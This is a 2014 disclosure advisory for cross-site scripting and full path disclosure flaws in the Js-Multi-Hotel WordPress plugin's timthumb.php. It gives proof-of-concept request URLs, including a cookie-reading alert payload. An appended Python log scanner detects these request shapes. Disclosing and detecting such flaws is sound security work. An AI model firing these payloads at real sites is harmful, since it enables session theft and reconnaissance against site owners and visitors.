securityvulns SECURITYVULNS:DOC:30605
May 04, 2014 - 12:00 a.m.

XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress


Hello 3APA3A!

These are vulnerabilities in the Js-Multi-Hotel plugin for WordPress.


Affected products:

Js-Multi-Hotel 2.2.1 and previous versions are vulnerable.


Affected vendors:

Joomlaskin
http://wordpress.org


Details:

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http://

I have disclosed it at my site (http://websecurity.com.ua/7082/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
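
As an added example (not part of the original advisory or the plugin's code), a site owner could scan access logs for requests to the plugin's timthumb.php whose `src` value matches either request shape listed under Details. The combined access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path is from the advisory; the combined access-log format is an assumption.
TIMTHUMB = "/wp-content/plugins/js-multihotel/includes/timthumb.php"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/May/2014:10:00:01 +0000] "GET ' + TIMTHUMB +
    '?src=%3C%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 400 512',
    '203.0.113.9 - - [04/May/2014:10:00:02 +0000] "GET ' + TIMTHUMB +
    '?src=http://site/wp-content/uploads/room.jpg&w=200 HTTP/1.1" 200 8841',
    '203.0.113.5 - - [04/May/2014:10:00:03 +0000] "GET ' + TIMTHUMB +
    '?src=http:// HTTP/1.1" 400 498',
    '203.0.113.9 - - [04/May/2014:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

def classify_src(src):
    """Label a decoded 'src' value, or return None if it looks like a normal image URL."""
    if re.search(r"[<>\"']", src):
        return "markup-in-src"       # XSS (WASC-08) request shape
    parts = urlsplit(src)
    if parts.scheme in ("http", "https") and not parts.netloc:
        return "url-without-host"    # full path disclosure (WASC-13) request shape
    return None

def scan(lines):
    """Return (line_number, label, decoded_src) for each suspicious timthumb request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith(TIMTHUMB):
            continue
        for src in parse_qs(target.query, keep_blank_values=True).get("src", []):
            label = classify_src(src)
            if label:
                findings.append((number, label, src))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The check decodes the query string before matching, so percent-encoded markup is caught as well as literal characters.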